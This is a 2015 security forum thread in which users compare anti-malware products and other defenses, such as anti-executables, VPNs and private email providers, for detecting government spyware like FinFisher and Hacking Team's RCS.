Best software for detecting government spy malware

Discussion in 'other anti-malware software' started by kinder2, Aug 18, 2015.

  1. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    All the anti malware software focus on finding malware made by criminals.
    But today we are getting more malware used by governments for spying, like Hacking Team and Gamma Finfisher, even NSA malware.
    I know some anti malware software ignore these government ones. Like Norton and McAfee, they turn blind eye to US government malware, because they are US companies. When Malwarebytes was given samples of Finfisher malware, they ignored it saying it was "too old" for them to care about. This is not a good attitude.
    Kaspersky and Bitdefender say they will detect government malware. Kaspersky seem serious about it, Bitdefender not so certain.
    There is old software Detekt for finding old Finfisher. It is useless now.
    Does anyone have opinion on which anti malware software is best for finding government malware?
     
  2. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,042
    This is where an app like Appguard comes in handy. Anything that violates it's rules is blocked, whether it's good or bad, so it covers you on this
     
  3. hjlbx

    hjlbx Guest

    @kinder2

    Hacking Team black-listed Emsisoft since both EAM and EIS detect their surveillance suites. Also, it did well at detecting Gamma International's FinFisher surveillance suite. Comodo does well at detecting surveillance surveillance suites as well.

    Also, as @Peter2150 states, an anti-executable is indispensable for very high-level system security.

    Just food for thought...
     
  4. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Thanks, Emsisoft have a blog showing leaked documents of Gamma and Hacking Team that their malware is ineffective against Emsisoft.
    http://blog.emsisoft.com/2015/07/27...which-protection-their-trojans-cant-get-past/
    The blog shows a partial screenshot of other programs that block Gamma and Hacking Team, but it is incomplete screenshot, anyone have the link to the complete list of antimalware software detecting Gamma and Hacking Team malware?
     
  5. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Appguard is going to be too annoying to use, it will block or warn about far too many legit operations than find the bad ones.
     
  6. ComputerSaysNo

    ComputerSaysNo Registered Member

    Joined:
    Aug 9, 2012
    Posts:
    1,416
    There is no product available that can detect unknown threats like zero day exploits. This is the reality of the world we live in.

    Anti-Exploit software is a good tool to have but it does not prevent you from being compromised 100% of the time.

    If you look at the "Echelon NSA Group" they were using undetectable hard drive firmware rootkits to get persistence. Good luck blocking that exploit.

    You need a layered approach to security which includes a harden OS, browser hardening, Anti-Malware, Behavior Blocker/HIPS, and Anti-Exploit.

    I only have 1 Windows box and that is for work. My home boxes I use Linux or OpenBSD. But I harden the crap out of my work box.
     
  7. ArchiveX

    ArchiveX Registered Member

    Joined:
    Apr 7, 2014
    Posts:
    1,015
    When it comes to zero-day exploits,
    most Security software...:isay:
     
  8. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,042
    not once it is set up. But the point is it does what you want. EIS is great also
     
  9. Paul R

    Paul R Registered Member

    Joined:
    Aug 5, 2014
    Posts:
    48
    Location:
    Bury, Lancashire

    http://ht.transparencytoolkit.org/K... Summary - ]HT[ :: KnowledgeBase Product.html
     
  10. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    331
    I will tell you a secret RCS and FinFisher are just like any other malware and by no way as complex as projects like Stuxnet, Careto, Regin, GrayFish, duqu2, etc.
     
  11. luciddream

    luciddream Registered Member

    Joined:
    Mar 22, 2007
    Posts:
    2,497
    People that know me know I'm definitely vehemently against relying on an AV/AM product, and especially an (all eggs in 1 basket) suite to deal with such a contingency. But that said, as others have pointed out, if I were to use an AV as a layer Emsisoft AM would be it.
     
  12. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Last edited by a moderator: Aug 19, 2015
  13. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Yes those projects are used by NSA, we cannot do anything about them. But we should do something about RCS and Finfisher, which are regularly used by police to snoop on persons of interest without warrant, injected through mobile phone vulnerabilities and ISP level cooperation (so there is no defence against getting those malware)
     
  14. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    331
    I think it's a bit naive to only focus on two families of malware.

    1. Government agencies can choose from more backdoors then only FinFisher and RCS
    2. It is possible to protect against the used infection techniques. Permanently using a VPN would rule out the change of using any network injector and running exploit mitigation software would significantly decrease the chance of your software getting exploited. (afaik none of the leaked HT exploits employed EMET bypasses for example.)
     
  15. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    1. I know there are more backdoors than Finfisher and RCS. I am trying to avoid security companies that ignore or shut their eyes to government malware. My thinking is if a security company detects both Finfisher and RCS now, they will probably detect other government backdoors in future.
    2. Permanent VPN use sounds wonderful in theory, but it does not work well when accessing some services like gmail, banking, ebay and even google search. These sites know you are using a VPN. Flags are raised requiring further verification by phone or captcha. I refuse to do phone verification when accessing email. Do you have a way to combine VPN and personal emailing comfortably? What exploit mitigation software do you have in mind? I find HIPS annoying, sometimes opening up a software creates a hundred pop ups needing to be clicked accept before one can continue with work.
     
  16. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    331
    Or just use a scanner which detects new executable files and determine manually whether a file is legit or not.

    Only once I have had problems regarding online accounts and the usage of VPN: An important account of mine once got revoked because they thought that my account had been hijacked...

    I only inform people about solutions that exist, I try to never recommend software to people on the Wilders forums for obvious reasons.
     
  17. TomAZ

    TomAZ Registered Member

    Joined:
    Feb 27, 2010
    Posts:
    1,002
    Location:
    USA
    I agree with this one! I'm not a seasoned vpn user, but I have tried it on several occasions and run into the same exact thing.
     
  18. Timok

    Timok Registered Member

    Joined:
    Jul 3, 2010
    Posts:
    51
    Location:
    Germany
  19. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Riseup is by referral only, mailbox.org has monthly fee, posteo.de and protonmail.ch make people think I am in Germany or Switzerland, systemli.org make people think I am a system administrator.
    There is public perception today that everyone has a gmail or hotmail/outlook or yahoo account, anything other than that is suspicious. These main providers hammer VPN users hard.
    The link you gave for stopping VPN detection, does it work for Google? I have feeling it stops VPN detection from browser fingerprinting, but it does not stop VPN detection from IP address checking, which most sites like Google do in realtime.
    If you use 24/7 VPN how do you deal with your banking sites and google asking for captcha every so often?
     
  20. subhrobhandari

    subhrobhandari Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    708
    How about Openmailbox, Ghostmail or SCryptmail?

    Usually in VPN Clients (saw this in CyberGhost, dont know about others) you can whitelist domains, which will be connected directly.
     
  21. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    These mail suggestions are better, still if you were to do business and give out a non gmail hotmail outlook yahoo account, it will immediately raise suspicion.
    Whitelisting domains exposes the user to injection attacks. Example you whitelist gmail, the isp can see you request gmail domain, it intercepts the traffic and lets you download a malware instead of the real gmail. The only way to be safe from injection attack from government or police is to have VPN on all the time, which is impossible when living a socially acceptable life.
     
  22. Timok

    Timok Registered Member

    Joined:
    Jul 3, 2010
    Posts:
    51
    Location:
    Germany
    WTF - I don't use online banking and I don't use my googlemail (I just have it for my Android handy to buy some Apps). On googlemail is an auto responder active with the information, that googlemail is unsecure. If someone want to communicate with me he has to use my addresses :) And I also don't care what people think from which country I come.

    @subhrobhandari

    scryptmail.com looks good
     
  23. subhrobhandari

    subhrobhandari Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    708
    What I do, I use my gmail main account for all official mails and most of the personal mails. I redirect some of my important mails, like transaction history, gift vouchers etc to another two non-google mailservers as soon as I log in, just to be sure I have a backup somewhere else other than my computer. I saw that last week google's Belgium datacenter permanently lost some user data due to hit of lightning, so it better to be safe. As much I would like to use Autistici (or such emails) for most of my personal emails, I cant. Apparently its pretty hard to teach the family members why ol' google is evil.

    This thread has gone off topic. ;)
     
  24. quietman

    quietman Registered Member

    Joined:
    Dec 27, 2014
    Posts:
    491
    Location:
    Earth .... occasionally
    I agree , subhrobhandari , off topic .....

    There is much more about Scryptmail in the Email options thread , including posts from the developer.

    Note that it has US based servers and is subject to US jurisdiction ( I know that is an issue for some ! )
     
  25. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
Loading...